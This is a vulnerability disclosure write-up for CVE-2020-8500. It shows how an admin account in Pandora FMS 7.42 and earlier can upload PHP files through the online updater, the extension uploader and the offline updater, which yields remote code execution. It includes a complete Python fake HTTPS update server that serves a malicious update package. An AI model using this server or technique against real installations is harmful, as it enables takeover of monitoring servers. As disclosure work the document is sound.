PHP file upload and remote code execution in Pandora FMS <= 7.42 (Extension,Online/Offline Update) (CVE-2020-8500)

cve-2020-8500

In Pandora FMS 742 and below it is possible to upload PHP files via the Extension Uploader and via the Online Installer. The enterprise edition offers the Offline installer as a feature. With the offline installer it is possible to do exactly the same.

What is allowed to a Web Admin and what is not?

It is not allowed to upload a PHP file even with an Admin account, because it is dangarous. (Vendor)

Key Topics

I know a button on a webpage is comfortable, but security starts where comfortability ends. What is good for a Wordpress site, maybe it is not good for a Monitoring System.

Technical Details

Note: The vulnerabilities exploitable only with a Web Admin account.

1. Online Updater

The online updater is a simple thing. The update package is a simple "oum" file (Online Update Manager). This file is a zip file which can contain PHP files.

The Update Manager URL can be configured (Update Manager -> Update Manager Options). This URL works only with https!

Generating Pem files

openssl req -newkey rsa:2048 -new -nodes -x509 -days 3650 -keyout key.pem -out cert.pem

Fake Pandora FMS Manager (You can execute it with python3 ./fake_pandorafms_https_server)

from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl
from io import BytesIO
import json

class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):

    def do_GET(self):
        self.send_response(200)
        self.send_header('Content-type', 'application/zip')
        self.end_headers()
        self.wfile.write(open('./k44.oum','rb').read())

    def do_POST(self):
        content_length = int(self.headers['Content-Length'])
        body = self.rfile.read(content_length)
        self.send_response(200)
        self.end_headers()
        response = BytesIO()
        response.write(b'This is POST request. ')
        response.write(b'Received: ')
        response.write(body)
        self.wfile.write(json.dumps([{ 'version': 'k4m1ll0_fake_version','file_name':'https://192.168.0.103:2000/k44.oum'}], ensure_ascii=False).encode())

httpd = HTTPServer(('0.0.0.0', 2000), SimpleHTTPRequestHandler)

httpd.socket = ssl.wrap_socket (httpd.socket, 
        keyfile="key.pem", 
        certfile='cert.pem', server_side=True)

httpd.serve_forever()

Preparing the update package

4

Configuring the URL to use my fake server

5

Checking updates

6

Install the Fake Update

7

Install - Success

8

Proof

9

Demo Video

Note: The installed files are accessible without authentication.

2. Extension Upload

admin tools->extension manager->extension uploader

Upload the "extension", which contains "k44_extension.php" file

1

The extracted file is accessible without Authentication.

2

Proof

3

Demo Video

3. Offline Updater

The offline updater works the same way as the online updater, the difference is just the uploading. The offline installer is an Enterprise feature now, but earlier it was part of the community edition. I performed the demo with the old version:

I used the same out file.

20

Upload

21

Update

22

Proof

23

Demo Video